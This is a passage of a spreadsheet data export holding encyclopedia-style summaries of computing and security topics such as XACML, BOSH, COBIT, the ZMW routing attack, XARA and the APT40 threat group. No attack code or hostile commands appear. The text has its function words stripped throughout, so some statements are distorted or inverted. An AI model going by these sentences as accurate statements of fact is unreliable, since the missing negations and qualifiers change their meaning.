organisation. many organisations trying implement projects, issue lack skills available. article stack, atul identifies five challenges organization wishing deploy openstack face. installation challenges openstack suite projects rather single product, various applications needs configured suit user's requirements, installation complex requires range complementary skill-sets optimum set-up. obvious solution would take complete vendor supplied package containing hardware software, although diligence essential. documentation this function nature documentation open source products openstack projects, managing document quality always going challenging. upgrading openstack main objectives using cloud type infrastructure offers users high reliability also high availability, something public cloud suppliers offer service level agreements.due openstack's multi-project development approach, complexity involved synchronising different projects upgrade mean downtime unavoidable. long term support it's quite common business keep using earlier release software time upgraded. reasons pretty obvious referred above. however, little incentive developers open source project provide support superseded code. addition, openstack formally discontinued support releases.given challenges appropriate route organization wishing implement openstack would vendor, source openstack appliance distribution. deployment models openstack project matured, vendors pioneered multiple ways customers deploy openstack: openstack-based public cloud vendor provides public cloud computing system based openstack project. on-premises distribution model, customer downloads installs openstack distribution internal network. distributions. hosted openstack private cloud vendor hosts openstack-based private cloud: including underlying hardware openstack software. openstack-as-a-service vendor hosts openstack management software (without hardware) service. customers sign service pair internal servers, storage networks fully operational private cloud. appliance based openstack nebula vendor sold appliances could plugged network spawned openstack deployment. distributions bright computing canonical (ubuntu) debian (which spin-merged micro focus/suse) mirantis oracle openstack oracle linux, oracle openstack oracle solaris stratoscale vmware integrated openstack (vio) also cloud-computing comparison cloud foundry openshift references external links official website</t>
  </si>
  <si>
    <t>ZMW attack</t>
  </si>
  <si>
    <t>attack hypothetical denial-of-service attack internet's routing infrastructure, named ying zhang, morley mao, wang, researchers published original paper considered possibility. relies using targeted denial-of-service attacks links carrying connections autonomous systems, attempt overwhelm routers default-free zone routing updates, leading disruption forcing perform continuous route recalculations.in 2010, security researcher schuchard published paper considering possibility using botnet perform attack internet's entire core infrastructure, hypothetically allowing botnet 250,000 computers "crash" entire internet. also shrew attack references external links defense</t>
  </si>
  <si>
    <t>CPTE Certified Penetration Testing Engineer</t>
  </si>
  <si>
    <t>certified penetration testing engineer (c)pte) internationally recognized cyber security certification administered united states-based information security company mile2. accreditation maps committee national security systems' 4013 education certification. c)pte certification considered five core cyber security certifications. accreditations obtaining c)pte certification requires proven proficiency knowledge five information security elements, penetration testing, data collection, scanning, enumeration, exploitation reporting.the cpte certification several information assurance accreditations recognized u.s. national security agency. certification also approved u.s. department homeland security's national initiative cyber security studies careers (nicss) u.s.-based national security systems committee. examination online exam c)pte accreditation lasts hours consists multiple choice questions. references external links mile2 c)pte website page beginners guide penetration testing</t>
  </si>
  <si>
    <t>XACML</t>
  </si>
  <si>
    <t>xacml stands "extensible access control markup language". standard defines declarative fine-grained, attribute-based access control policy language, architecture, processing model describing evaluate access requests according rules defined policies. published standard specification, goals xacml promote common terminology interoperability access control implementations multiple vendors. xacml primarily attribute-based access control system (abac), also known policy-based access control (pbac) system, attributes (bits data) associated user action resource inputs decision whether given user access given resource particular way. role-based access control (rbac) also implemented xacml specialization abac. xacml model supports encourages separation enforcement (pep) decision making (pdp) management definition (pap) authorization. when access decisions hard-coded within applications based local machine userids access control lists (acls)), difficult update decision criteria governing policy changes hard achieve visibility audits authorization place. when client decoupled access decision, authorization policies updated affect clients immediately. history version ratified oasis standards organization 2003.version ratified oasis standards organization february 2005.version ratified oasis january 2013. architecture terminology non-normative terminology (following 2904, except pap) flow user sends request intercepted policy enforcement point (pep) converts request xacml authorization request forwards authorization request policy decision point (pdp) evaluates authorization request policies configured with. policies acquired policy retrieval point (prp) managed policy administration point (pap). needed also retrieves attribute values underlying policy information points (pip). reaches decision (permit deny notapplicable indeterminate) returns policy elements structural elements xacml structured levels elements: policyset, policy, rule.a policy contain number policy elements policy elements. policy contain number rule elements. attributes categories policies, policy sets, rules requests subjects, resources, environments, actions. subject element entity requesting access. subject attributes. resource element data, service system component. resource attributes. action element defines type access requested resource. actions attributes. environment element optionally provide additional information. targets xacml provides target, basically simplified conditions subject, resource, action must policy set, policy, rule apply given request. once policy policy found apply given request, rules evaluated determine access decision response. addition check applicability, target information also provides index policies, useful need store many policies quickly sift find ones apply. when request access service arrives, know look policies might apply request policies indexed based target constraints. note target also specify applies request. policy set, policy rule contain target elements. conditions conditions exist rules. conditions essentially advanced form target broader range functions importantly used compare attributes together, e.g. subject-id==doctor-id. with conditions, possible implement segregation duty checks relationship-based access control. obligations advice within xacml, concept called obligations used. obligation directive policy decision point (pdp) policy enforcement point (pep) must carried access approved. unable comply directive, approved access must realized. augmentation obligations eliminates formal requirements policy enforcement. example obligation could look like this: access control rule: allow access resource medicaljournal attribute patientid=x subject match designateddoctorofpatient action read obligation permit: dolog_inform(patientid, subject, time) deny dolog_unauthorizedlogin(patientid, subject, time) xacml's obligation effective meet formal requirements (non-repudiation example) hard implement access control rules. furthermore, formal requirements part access control policy obligations separate functions, makes policies consistent centralization environment easier achieve. obligations used "break-the-glass" scenarios trust elevation ("you cannot transfer $1,000 without two-factor authentication link page"). addition obligations, xacml supports advice identical obligations difference obligated enforce advice (hence name). combining algorithms what happens xacml rules policies) contradict other? imagine instance first rule would managers view documents second rule would work 9am. what request alice trying view document 8am? which rule wins? this combining algorithms tell they help resolve conflicts. xacml defines number combining algorithms identified rulecombiningalgid policycombiningalgid attribute &lt;policy&gt; &lt;policyset&gt; elements, respectively. rule-combining algorithm defines procedure arriving access decision given individual results evaluation rules. similarly, policy-combining algorithm defines procedure arriving access decision given individual results evaluation policies. truth table located help understand combining algorithms process combine policies. functions xacml defines long list functions (close 300) manipulate compare attributes attributes values: equality, inequality matching functions arithmetic functions string functions logical functions (and, not) functions higher order functions regular expression functions xpath functionsthe functions identifiers fully described standard. functions type-specific i.e. function string equality different integer equality. equality, inequality matching functions arithmetic functions refer standard formal definition function. (double integer) subtract (double integer) multiply (double integer) divide (double integer) (double integer) (double integer) round floor string functions refer standard formal definition function. string-concatenate string-starts-with string-ends-with string-contains string-substring logical functions (and, not) functions regular expression functions xpath functions higher order functions list higher order functions listed below. formal definition, refer xacml standard. anyof (urn:oasis:names:tc:xacml:3.0:function:any-of) parameters: anyatomicorbag anyatomicorbag* return value: boolean description: function takes boolean function attribute values bags. higher-order function applies boolean function remaining parameters. example: anyof(function[stringequal], allowedroles, stringoneandonly(role)) return true role single-valued, least value attribute allowedroles equal value inside single-valued attribute role. allof (urn:oasis:names:tc:xacml:3.0:function:all-of) parameters: anyatomicorbag anyatomicorbag* return value: boolean anyofany (urn:oasis:names:tc:xacml:3.0:function:any-of-any) parameters: anyatomicorbag anyatomicorbag* return value: boolean allofany (urn:oasis:names:tc:xacml:1.0:function:all-of-any) parameters: bag[anyatomic] bag[anyatomic] return value: boolean anyofall (urn:oasis:names:tc:xacml:1.0:function:any-of-all) parameters: bag[anyatomic] bag[anyatomic] return value: boolean allofall (urn:oasis:names:tc:xacml:1.0:function:all-of-all) parameters: bag[anyatomic] bag[anyatomic] return value: boolean (urn:oasis:names:tc:xacml:1.0:function:map) parameters: anyatomicorbag anyatomicorbag* return value: bag[anyatomic] xacml schema http://docs.oasis-open.org/xacml/3.0/xacml-core-v3-schema-wd-17.xsd data types http://www.w3.org/2001/xmlschema#anyuri http://www.w3.org/2001/xmlschema#base64binary http://www.w3.org/2001/xmlschema#boolean http://www.w3.org/2001/xmlschema#date http://www.w3.org/2001/xmlschema#datetime http://www.w3.org/2001/xmlschema#daytimeduration http://www.w3.org/2001/xmlschema#double http://www.w3.org/2001/xmlschema#hexbinary http://www.w3.org/2001/xmlschema#integer http://www.w3.org/2001/xmlschema#string http://www.w3.org/2001/xmlschema#time http://www.w3.org/2001/xmlschema#yearmonthduration urn:oasis:names:tc:xacml:1.0:data-type:rfc822name urn:oasis:names:tc:xacml:1.0:data-type:x500name urn:oasis:names:tc:xacml:2.0:data-type:dnsname urn:oasis:names:tc:xacml:2.0:data-type:ipaddress urn:oasis:names:tc:xacml:3.0:data-type:xpathexpression xacml profiles xacml introduces administrative delegation, json profile xacml (request/response), rest profile xacml, multiple decision profile xacml, many more. delegation implementation delegation xacml 3.0. delegation mechanism used support decentralized administration access policies. allows authority (delegator) delegate parts authority someone else's authority another user (delegate) without need involve modification root policy. this because, delegation model, delegation rights separated access rights. these instead referred administrative control policies. access control administrative policies work together following scenario: partnership companies' many services protected access control system. system implements following central rules protect resources allow delegation: access control rules: allow access resource attribute webservice subject employee action read write. administration control rules: allow delegation access control rule subjects attribute consultant. conditions: delegation must expire within months, resource must attribute strictlyinternal. (attributes fetched external source, e.g. ldap catalog.) when consultant enters corporation, delegation issued locally consultant's supervisor, authorizing consultant access systems directly. delegator (the supervisor scenario) right delegate limited access rights consultants. other features other features xacml listed http://www.webfarmr.eu/2010/07/enhancements-and-new-features-in-xacml-3-axiomatics/ xacml also publishing list changes here: http://wiki.oasis-open.org/xacml/differencesbetweenxacml2.0andxacml3.0 sample policies date time-based authorization xacml this rule implements use-it-lose-it access control paradigm. user days, lose access. pseudo-code: deny currentdatetime lastlogin days time-based authorization xacml this rule grants access current time greater less 5pm. sample requests responses xacml request xacml responses xacml sample response xacml sample response obligation following contains obligation block. obligations statements returned along decision enrich decision flow. example, must access granted. multiple decision profile xacml default processes single request time e.g. "can alice view item #1?". replies single decision. times, though, necessary send multiple requests e.g. "can alice view edit delete items #3?". multiple decision profile xacml allows case. typically product combinations i.e. example aforementioned decisions returned single response. sample json request multiple decision profile enable send array objects categories rather array object simply object). instance, accesssubject object resource array objects. latter trigger process pdps support profile. note well includeinresult attribute tells return xacml attribute value response decisions correlated relevant attribute values. sample json response multiple decision profile developer orientation 2013 2014, xacml technical committee focused designing profiles facilitate developer integration. these include: rest profile xacml written remon sinnema json profile xacml written david brossard axiomatics alfa profile xacml written pablo giambiagi, srijith nair, david brossard axiomaticsall three profiles showcased cloud identity summit 2014 monterey, california. using profiles, integrating fine-grained authorization applications becomes much easier. alfa profile xacml alfa stands abbreviated language authorization. lightweight syntax used implement policy-based access control policies. examples refer main article. json profile xacml json profile xacml simplifies integration pdp. sample json request sample json response xacml standards xacml open policy agent open policy agent (opa) similar xacml provides policy decision point, externalized authorization, policy language (rego). specializes infrastructure authorization (e.g. kubernetes, istio...) rather general-purpose, api-centric, data-centric xacml addresses. xacml saml saml identity federation standard used authentication. saml used common identity token format different applications. saml xacml defined oasis. saml xacml designed interoperate saml used carry identity information virtual identities xacml used drive access control logic policies. xacml oauth oauth considered authorization standard. differs xacml though origin, purpose, applications. oauth about: delegated access control: user, delegate another user service access resource own. instance oauth, grant twitter (the service) ability post facebook wall (the resource). handling password anti-pattern. whenever want integrate services together, traditional, legacy model provide service user credentials service service pretend service this many risks course. using oauth eliminates issues patterns lets user control service behalf user service http-based services resources managing owner (user) approvalxacml handle user approval delegated access password management. xacml simply provides: access control architecture notion policy decision point (pdp) previously discussed policy enforcement point (pep). policy language express wide range access control policies including policies consents handled defined oauth.xacml oauth combined together deliver comprehensive approach authorization. also role-based access control attribute-based access control mandatory access control discretionary access control permis geoxacml model-driven security authorization references external links extensible access control markup language oasis xacml committee website oasis declaration issues software patents</t>
  </si>
  <si>
    <t>Amazingports</t>
  </si>
  <si>
    <t>amazingports linux-based software product customized firewall, captive portal billing system (hotspots). project started 2001. description amazingports mainly deployed access control system private public networks. deployed single hotspot controller airports, hotels, private locations hospitals. used internet cafes europe 2002 together intel. used city-wide wi-fi project 2004, internet roaming 2002.amazingports created 2001 initial vision building free networks. later company refocused provided technology network builders. company implemented service-oriented provisioning 2002 first implement 802.11a public hotspots europe. during 2009 2010 administrative system updated. features include: firewall service oriented provisioning distributed and/or centralised routing fully customisable language sensitive captive portal third party page dynamic host configuration protocol (dhcp) server integrated paypal payments supporting many currencies automatic currency updates european central bank roles based administration seamless roaming compliance anti-terrorist directive 2006/24/ec references external links amazingports home page full features list hotspot pricing strategies hotspots computer sweden nyteknik internet actu cnet</t>
  </si>
  <si>
    <t>XARA</t>
  </si>
  <si>
    <t>xara acronym "unauthorized cross-app resource access", describes category zero-day vulnerabilities computer software systems. initial disclosure academic research paper entitled "unauthorized cross-app resource access ios". published 2015 team researchers indiana university, tsinghua university, peking university, chinese academy sciences, georgia institute technology. paper widely released public june 2015 commented mainstream technical media outlets.the paper identifies number separate categories zero threats applications stored passwords potentially exploited malware devices paper also discloses existence similar vulnerabilities android devices. response vendors june 2015, apple computer responded press implemented countermeasures exclude malware containing xara exploit store. attack vectors xara attack vector violates principles computer security sandbox. untrusted partners using shared resources file system, keychain. inter-process communication without verification partner. weak security policies system installer allow applications designated shared resource bundles. known systems problems apple computer apple computer android google also targeted attacks access control software-defined protection sandbox (computer security) vector (malware) references</t>
  </si>
  <si>
    <t>OpenBroadcaster</t>
  </si>
  <si>
    <t>openbroadcaster web-based, open-source system community radio television broadcast transmitters simple interface. history initial concept develop based radio system emergency messages public service announcements export africa using windup radio designed trevor baylis. part yukon college innovation project originating tagish yukon territory canada. labour weekend, 1997 cfet-fm 106.7fm launched, benefit communities tagish, johnson's crossing marsh lake, one-man operation, local volunteers could record material sending station internet broadcast. system used community's local emergency population warning instantaneous relay yukon forestry service alerts wildfire situations. 2004 cfet-fm radio began using openbroadcaster user generated radio followed cjuc-fm forming yukon network radio stations. similar models indigenous community radio networks supported nationally language revitalization. version history components observer: html5 ajax application uploading content, creating smart playlists, managing users, assigning users timeslots scheduling music. decentralized file storage centralized cloud computing management. obplayer: linux application logging managing devices connected transmitters, digital screens supported devices accessible secure http(s) admin panel. supports audio ravenna (networking). mobile: cross platform application written phonegap allow users ability pitch electronic money performers artists real time. practical uses audio source client icecast shoutcast streaming media server, lpfm regulated radio, smart music scheduling system microbroadcast theme based music segments restaurants public spaces, tourism radio audio tour coded triggering multicultural visitor experience, tourist information highway advisory radio, user determined music discovery service, dynamic podcast assembler, logging archiving, community radio campus radio high school radio networking, special interest multicultural media canada broadcasters, syndicated store advertising public address distribution, music hold telephone systems, computer crowdcasting community jukebox, source interplanetary active seti, datacasting remotely control addressability devices crisis mapping, song requester 100% user-controlled radio. video power community television, regulated service, user generated community channel (canada) cable user generated adult entertainment channel digital signage visitor information, analogue digital source material distribution archiving display museums, video demand podcasting utilizing digital rights management, out-of-home advertising shopping mall directories digital menu boards point-of-purchase promotions. also broadcast automation radio software community radio linux radio broadcasting software list music software references external links official website</t>
  </si>
  <si>
    <t>COSIC</t>
  </si>
  <si>
    <t>computer security industrial cryptography research group, commonly called cosic, research group department electrical engineering leuven, headed bart preneel. research research expertise digital security: security architectures information communication systems cryptographic algorithms protocols symmetric public post-quantum security embedded systems privacy-preserving systemsapplications: cloud automotive privacy data protection trusted systems e-payments e-documents well-known successes selection rijndael advanced encryption standard (aes). currently used millions users thousand products, protection government information. research projects cosic participated european research projects. imec cosic part smart applications innovation services imec. references external links official website imec wall street journal: belgium, encryption powerhouse rises</t>
  </si>
  <si>
    <t>COBIT</t>
  </si>
  <si>
    <t>cobit (control objectives information related technologies) framework created isaca information technology (it) management governance.the framework business focused defines generic processes management process defined together process inputs outputs, process-activities, process objectives, performance measures elementary maturity model. framework components business goals linked measured create responsibilities business teams. five processes identified: evaluate, direct monitor (edm); align, plan organize (apo); build, acquire implement (bai); deliver, service support (dss); monitor, evaluate assess (mea).the cobit framework ties coso, itil, bisl, 27000, cmmi, togaf pmbok.the framework helps companies follow law, agile earn more.below cobit components: framework: organizes governance objectives good practices domains processes links business requirements. process descriptions: reference process model common language everyone organization. processes responsibility areas plan, build, run, monitor. control objectives: provides complete high-level requirements considered management effective control process. management guidelines: helps assign responsibility, agree objectives, measure performance, illustrate interrelationship processes. maturity models: assesses maturity capability process helps address gaps.the standard meets needs practice, maintaining independence specific manufacturers, technologies platforms. when developing standard, possible auditing company's system designing system. first case, cobit allows determine degree conformity system study best examples, second, design system almost ideal characteristics. history cobit initially "control objectives information related technologies," though release framework people talked "cobit" "control objectives "control objectives information related technology."isaca first released cobit 1996, originally control objectives help financial audit community better maneuver it-related environments. seeing value expanding framework beyond auditing realm, isaca released broader version 1998 expanded even adding management guidelines 2000's version development 8015: australian standard corporate governance information communication technology january 2005 international draft standard iso/iec 29382 (which soon became iso/iec 38500) january 2007 increased awareness need information communication technology (ict) governance components. isaca inevitably added related components/frameworks versions 2005 2007 respectively, "addressing it-related business processes responsibilities value creation (val risk management (risk it)."cobit (2012) based cobit 4.1, risk frameworks, draws isaca's assurance framework (itaf) business model information security (bmis).isaca currently offers certification tracks cobit 2019 (cobit foundations, cobit design implementation, implementing nist cybersecurity framework using cobit 2019) well certification previous version (cobit also governance data governance information quality management itil iso/iec 38500 references external links cobit page isaca checklist/cheatsheet summarizing cobit user case cobit framework: marcos,</t>
  </si>
  <si>
    <t>Rainbow Series</t>
  </si>
  <si>
    <t>rainbow series (sometimes known rainbow books) series computer security standards guidelines published united states government 1980s 1990s. they originally published u.s. department defense computer security center, national computer security center. objective these standards describe process evaluation trusted systems. cases, u.s. government entities well private firms) would require formal validation computer technology using process part procurement criteria. many standards influenced, superseded common criteria. books nicknames based color cover. example, trusted computer system evaluation criteria referred "the orange book." book entitled applied cryptography, security expert bruce schneier states ncsc-tg-021 "can't even begin describe color [the] cover" books series "hideously colored covers." goes describe receive copy them, saying "don't tell sent you." most significant rainbow series books references external links rainbow series federation american scientists, explanation rainbow series archive information assurance</t>
  </si>
  <si>
    <t>Physical Security Interoperability Alliance</t>
  </si>
  <si>
    <t>physical security interoperability alliance (psia) global consortium physical security manufacturers systems integrators focused promoting interoperability ip-enabled security devices systems across physical security ecosystem well enterprise building automation systems.the psia promotes develops open specifications, relevant networked physical security technology, across industry segments including video, storage, analytics, intrusion, access control. work analogous groups consortia developed standardized methods allow different types equipment seamlessly connect share data, bluetooth. specifications psia created seven complementary specifications enable systems devices interoperate exchange data intelligence.three specifications “reference works” family specifications. these service model; psia common metadata event model; psia common security model. these “common models” define describe various security events well computer network software protocols relevant security devices systems.the four psia specifications correspond domains security ecosystem. these media device specification, recording content management specification, video analytics specification area control specification. these base communications security events psia common metadata event model, reference works described above.psia specifications expected become critical security system architecture major users integrate video surveillance, access area control, mobile devices local cloud-based storage across common information technology platform. psia liaison international electrotechnical commission specifications access control video. access control specification, 60839-11-1, pending vote, expected impact manufacturing interoperability thousands access control systems. psia common security model v1.0 psia common security model (csec) specification comprehensive psia specification protocol, data user security. covers security requirements definitions network session security, certificate management, user permission management. these security definitions apply psia nodes. psia common metadata event model common metadata event model provides common services used disparate physical security technologies, chemical/biological sensors, intrusion devices, video analytics, traffic control sensors, respond various types alerts. this specification allows vendors simplify interoperability communications simply putting device-specific information baseline common metadata event model protocols services. media device specification (ipmd) media device (video) specification enables interoperability among disparate products comply specification, camera, intrusion device video management access control system. interoperability based specification eliminates need software development kits custom drivers interfaces. essentially creates common used device vendors offers alternative proprietary apis exist today. recording content management (racm) specification, version 1.1a psia recording content management (racm) specification, version 1.1a, describes psia standards recording, managing, searching, describing, streaming multimedia information networks. this includes support nvrs dvrs. specification references psia service model media device specifications. schema definitions examples included specification implementers developing standards-based products. video analytics specification v1.0 v1.0 video analytics specification (vas) specifies interface enables devices video management/surveillance systems communicate video analytics data standardized way. scope initial release specification focuses entirely video analytics capabilities discovery analytic data output. video analytic capabilities discovery include standard configuration data exchange enable analytic device communicate another device application basic analytic capabilities device level video channel level (for multichannel devices). this includes information psia version number supported, analytic vendor information (name, software version number, etc.), event types mechanisms supported, supported configurations. from analytic output perspective, v1.0 includes definition multiple types analytic events, including alerts counts, well video analytics metadata output. psia area control specification v1.0 this specification standardizes communication access control intrusion products, making interoperable overall security system. this specification takes advantage psia specs, especially common metadata events model (cmem). harmonizing sharing data access control, intrusion, video, analytics systems results optimized easily integrated security management. psia access control profile intrusion detection profile psia currently offers access control profile intrusion detection profile, derived psia’s area control specification. every manufacturer supports every case covered area control specification. complying applicable profiles, manufacturers still build psia plug-and-play interoperability products. products technology comply psia profile interoperate product technology psia compliant profile. psia offers profiles test tool validate profiles implementation correct complete ensures manufacturers’ products interoperate psia-compliant products. specification adoption more 1500 companies registered media device (video) specification since initial release march 2008. commercially available products systems psia-compliant include physical security information management (psim) systems; video management systems; surveillance cameras; video analytics; access control systems; sensors intrusion detection devices. founding psia david bunzel, executive director data storage industry standards association, began exploring surveillance video storage requirements 2007 physical security industry. physical security industry known closed, proprietary systems; custom coding typically required integrate closed system system digital tool. bunzel convened meeting security industry leaders discuss creating open standards physical security industry. following companies initial meeting: adesta; adt; anixter; axis; cisco; csc; security; genetec; ibm; iqinvision; johnson controls; march networks; pelco; objectvideo; orsus; panasonic; sony; texas instruments; verint; vidyo. development psia specifications psia supports license-free standards specifications, vetted open collaborative manner offered security industry whole. five active working groups, video, video analytics, recording content management, area control, systems, develop specifications. specification developed variety ways, including submission core document member company working group submission based input committee members. either case document expanded reviewed working group members, consensus determining features characteristics specification. members organization's members include leading manufacturers, systems integrators, consultants users. these include assa abloy, cisco systems, hid, honeywell, ingersoll-rand, inovonics, iqinvision, last lock, lenel, kastle systems, milestone systems, nice systems, objectvideo, onssi, proximex, sccg, sentry enterprises, tyco international, utc, verint, vidsys, security. formerly also hikvision dahua subsequently banned onvif human rights abuses timeline february 2008 –the psia founded march 2009—ip media device specification released march 2009—the psia incorporates december 2009—recording content management (racm) specification released september 2010—video analytics specification released april 2011—common metadata event model released november 2011—area control specification released june 2013—profiles released access control intrusion detection also onvif references external links official website</t>
  </si>
  <si>
    <t>APT40</t>
  </si>
  <si>
    <t>apt40 (also known bronze mohawk secureworks), feverdream, g0065, gadolinium microsoft), greencrash, hellsing kaspersky), kryptonite panda crowdstrike), leviathan proofpoint), mudcarp, periscope, temp.periscope, temp.jumper) advanced persistent threat located haikou, hainan province, people's republic china (prc), active since least 2009. apt40 targeted governmental organizations, companies, universities wide range industries, including biomedical, robotics, maritime research, across united states, canada, europe, middle east, south china area, well industries included china's belt road initiative.apt40 closely connected hafnium. indictment july 2021, u.s. department justice (doj) unsealed indictment four apt40 cyber actors illicit computer network exploitation activities front company hainan xiandun technology development company. also cyberwarfare china apollo references</t>
  </si>
  <si>
    <t>BOSH (software)</t>
  </si>
  <si>
    <t>bosh open-source software project offers toolchain release engineering, software deployment application lifecycle management large-scale distributed services. toolchain made server (the bosh director) command line tool. bosh typically used package, deploy manage cloud software. while bosh initially developed vmware 2010 deploy cloud foundry paas, used deploy software (such hadoop, rabbitmq, mysql instance). bosh designed manage whole lifecycle large distributed systems. since march 2016, bosh manage deployments microsoft windows linux servers. bosh director communicates single infrastructure service (iaas) provider manage underlying networking virtual machines (vms) containers). several iaas providers supported: amazon services ec2, apache cloudstack, google compute engine, microsoft azure, openstack, vmware vsphere. help support underlying iaas providers, bosh uses concept cloud provider interface (cpi). there implementation iaas providers listed above. typically used deploy vms, used deploy containers well. cpis exist deploying containers bosh actively supported. one, bosh uses deploys pivotal software's garden containers (garden similar docker) single virtual machine, virtualbox vmware workstation. theory, container engine could supported, necessary cpis developed. bosh indifferently supporting deployments containers, bosh uses generic term “instances” designate those. choose whether bosh “instance” actually container. workflow once installed, bosh server accepts uploading root filesystems (called “stemcells”) packages (called “releases”) when bosh server necessary bits deploying given software system, told proceed, described yaml deployment manifest. bosh progressively deploys “instances” (vms containers), using canaries avoid deploying failing configurations. once software system deployed, bosh monitors instances continuously allow detecting failing instances, resurrecting missing one. when bosh deployment manifest changed, bosh accepts roll implied modifications proceeding progressively, instance instance. this means bosh upgrade live clusters possibly downtime. concepts release bosh release either archive file repository. cases, describes software system deployed bosh. purpose, packages related binary assets, source code, compilation scripts, configurable properties, startup scripts templates configuration files. bosh releases made “packages” “jobs”. roughly, bosh packages provide something run, bosh jobs describe things configured run. bosh package details necessary source code, binary assets (called “blobs”), compilation scripts building given software component. there ways provide binary “blobs”. bosh release provided archive file, blobs directly included. bosh releases provided repositories, tends problematic blobs big. that's bosh release provides concept “blobstore”, referenced blobs fetched. most bosh releases blobstores backed public amazon buckets, ways refer private local “blobstore” bosh release. bosh packages always subject compilation phase, even extracts files archive copies proper target directory. compile given package, bosh spawns ephemeral compilation instance container) includes required packages blobs, declared package specification. dedicated instance, bosh runs compilation script, seals compilation result database, safely used reproducible deployments. bosh jobs hand, provide configuration properties (that possibly documented), templates configuration files, startup scripts. bosh jobs refer many packages dependencies. jobs also sealed bosh database, templates configuration files rendered deploy time, configuration properties resolved. these configuration properties usually addresses, port numbers, user names, passwords, domain names, etc. stemcell bosh stemcell packages basics creating instance container). namely, bosh stemcell ships operating system image along bosh agent copy monit, used manage services (called “jobs”) hosted instance. bosh agent helps bosh communicate instance life cycle. stemcell concept bosh similar virtual machine images like amazon's amis, bosh stemcells meant specialized particular usage. instead, bosh provides different stemcells supporting different operating systems (centos, ubuntu windows), different underlying iaas providers (aws openstack). name “stemcell” originated biological term “stem cells”, refers undifferentiated cells able grow diverse cell types later. similarly, instances created bosh stemcell identical beginning. after inception, instances configured different cpu/memory/storage/network, installed different software packages. hence, instances built bosh stemcell behave differently. bosh agent bosh agent service runs every bosh-deployed following: sets e.g., configures local disks, configure format attached (secondary) disks, configures networks accepts requests director, e.g., pings, management requests manages jobs: starting, stopping, monitoring health deployment bosh deployment basically yaml deployment manifest, user describes bosh releases bosh stemcells use, compose jobs groups identical instances (historically misnamed “jobs” later renamed “instance groups”). within “instance groups”, bosh span identical instances (vms containers) across different availability zones, order minimise risk instances time. this particularly useful deploying highly available databases applications. cases, users work deployment manifest yaml file. instead, deployment manifest split smaller files easier maintain. these separate files merged tools like spiff spruce, right uploaded bosh server deployed. deployment manifest, configuration properties, declared jobs referenced releases, customized. different jobs refer configuration properties name, order share common settings. principles bosh purposefully constructed address four principles modern release engineering following ways: identifiability being able identify source, tools, environment, components make particular release. concept “release”, bosh packages related source code, binary assets, configurable properties, compilation scripts, startup scripts. this allows users easily track actually deployed, run. additionally, bosh provides capture root filesystems basis deployed instances (vms containers), single images called “stemcells”. bosh releases bosh stemcells identified uuids sealed sha-1 checksums. reproducibility ability integrate source, third party components, data, deployment externals software system order guarantee operational stability. bosh tool chain provides centralized server operating deployed systems. this server holds software “releases”, operating system images (called “stemcells”), persistent data, system configuration. therefore, given deployment guaranteed reproduce identical result. consistency mission provide stable framework development, deployment, audit, accountability software components. bosh achieves consistency software “releases”, bring consistent framework developing deploying software systems. moreover, audit accountability provided bosh server, allows users track changes made deployed systems. agility ongoing research repercussions modern software engineering practices productivity software cycle, i.e. continuous integration. bosh tool chain integrates well current best practices software engineering (including continuous delivery) providing ways easily create software releases automated update complex deployed systems simple commands. history designed address shortcomings found available tools manage cloud foundry. chef used originally, limited ability package, spin up/down servers, limited monitoring self-management capabilities. originally developed cloud foundry’s needs, project grown completely generic, used orchestration software hadoop, rabbitmq, mysql similar platform application software. architecture bosh installation made several separate components possibly split across different containers: director “brain” server director database, made postgresql instance, redis instance blobstore storing compiled packages jobs health monitor keeps track instances (vms containers) status many bosh agents, deployed instance nats message connecting director, health monitor, deployed bosh agents (cloud provider interface), executable binary conforming specific apia bosh managed environment usually centers around director deployed cloud platform compatibility bosh connects underlying iaas layer abstraction called (cloud provider interface). there cpis available amazon services, certain openstack versions, vsphere, vcloud. some community maintained cpis exist google compute engine, microsoft azure cloudstack. deployment bosh deployed bosh release, create “chicken egg” surprise newcomers. bosh server software deploy bosh releases. there bosh provisioner project deploy bosh docker container, bare metal server. this component used bosh packer provisioner, creates vagrant running bosh-lite, users rely learning bosh. governance once sub-component cloud foundry, bosh separate open source project, aims deploying distributed software. bosh managed cloud foundry foundation. nearly contributions bosh made pivotal. users pivotal uses bosh orchestrate cloud foundry within pivotal cloud foundry (pcf), well pivotal data services cloud foundry. announced public users bosh include axel springer, corelogic, ibm, monsanto, philips, sap, swisscom. distributions bosh commercially distributed standalone product. included part pivotal cloud foundry, bluemix, helion developer platform, also used supported commercially cloud credo, stark wayne, gstack, others. references external links official website</t>
  </si>
  <si>
    <t>CUPS (CMU)</t>
  </si>
  <si>
    <t>carnegie mellon university usable privacy security laboratory (cups) established spring 2004 bring together carnegie mellon university researchers working diverse projects related understanding improving usability privacy security software systems. privacy security research community become increasingly aware usability problems severely impact effectiveness mechanisms designed provide security privacy software systems. indeed, four grand research challenges information security assurance identified computing research association 2003 "give end-users security controls understand privacy control dynamic, pervasive computing environments future." this challenge cups strives address. cups affiliated carnegie mellon cylab members engineering public policy department, school computer science, electrical computer engineering department, heinz college, department social decision sciences. projects computer-readable privacy policies members cups members working group, working developing specification. fall 2005, at&amp;t gave rights source code trademarks surrounding privacy bird, user-agent. privacy bird currently maintained distributed lab. summer 2005, made available public "p3p-enabled search engine", known privacy finder. allowed user reorder search results based whether site complied privacy preferences. this information gleaned policies found sites. since 2012, privacy finder "temporarily service", indication service would restored. additionally, archives sites privacy policies creating toolkit automated analysis policies well natural language privacy policies. supporting trust decisions more recently, examining trends phishing attacks well users' perceptions attacks develop better methods detecting reporting phishing messages. people lorrie cranor, director alessandro acquisti julie downs serge egelman mandy holbrook jason hong patrick gage kelley ponnurangam kumaraguru cynthia adrian perrig robert reeder sasha romanosky norman sadeh steve sheng janice tsai kami vaniea external links official cups site privacy bird privacy finder</t>
  </si>
  <si>
    <t>CBEFF</t>
  </si>
  <si>
